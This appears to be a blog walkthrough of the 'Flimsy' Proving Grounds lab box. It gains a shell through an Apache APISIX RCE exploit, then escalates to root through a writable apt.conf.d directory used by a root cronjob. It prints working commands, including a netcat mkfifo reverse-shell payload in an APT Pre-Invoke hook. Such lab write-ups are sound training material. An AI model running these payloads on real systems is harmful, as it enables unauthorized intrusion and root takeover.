Proving Grounds — Flimsy(Easy)Linux Box — Walkthrough A Journey To Offensive Security
Introduction:
In this post, we’ll walk through an easy-level Linux box, codenamed “Flimsy.” This box challenges penetration testers with exploiting an Apache APISIX remote code execution (RCE) vulnerability and leveraging privilege escalation techniques using weak service configurations. Let’s dive into the process, starting from initial enumeration to obtaining root access.
Information Gathering:
During the initial enumeration, port 43500 identified as OpenResty web app server.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-27 19:59 PDT
Nmap scan report for 192.168.210.220
Host is up (0.095s latency).
Not shown: 65378 filtered tcp ports (no-response), 152 filtered tcp ports (host-prohibited), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
43500/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 152.01 seconds
Nmap scan report for 192.168.219.220
Host is up (0.096s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Upright
3306/tcp open mysql MySQL (unauthorized)
43500/tcp open http OpenResty web app server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.32 seconds- We find that server APISIX version 2.8 is being used when we perform a nikto scan on the OpenResty web app service on port 43500.
- In our investigation to determine whether the Apache APISIX version was vulnerable to known attacks, we discover the vulnerability listed below:
- We git clone the exploit to our Kali machine.
- We open a netcat listener on port 80 on our Kali machine.
- We run the exploit by entering the following command.
python3 apisix-exploit.py http://192.168.219.220:43500/ 192.168.45.178 80
- With the reverse shell successfully executed, we gained a low-privileged user session on the machine.
- To establish a TTY shell, we type the command below.
python3 -c 'import pty;pty.spawn("/bin/bash")'- We transfer Linpeas to the target.
- We discover that a cronjob is running the apt-get update as root.
- Searching for “apt update cronjob privilege escalation” on Google yields instructions on how to escalate privileges.
- Per the privilege escalation instructions we perform the following.
- We confirm the below file is writable.
/etc/apt/apt.conf.d
- We launch a netcat listener on port 4444 on a different terminal.
- We are granted root access to a reverse shell when executing the following command on the target machine and waiting a brief amount of time.
echo 'APT::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.178 4444 >/tmp/f"}' > pwn
Improved Skills
- Learned an APT Privilege Escalation vector
Conclusion
This walkthrough of the “Flimsy” box illustrates the importance of thorough enumeration and recognizing known vulnerabilities for gaining initial access. The box also emphasizes the value of post-exploitation tools like Linpeas for identifying privilege escalation vectors.
Please feel free to reach out to me!
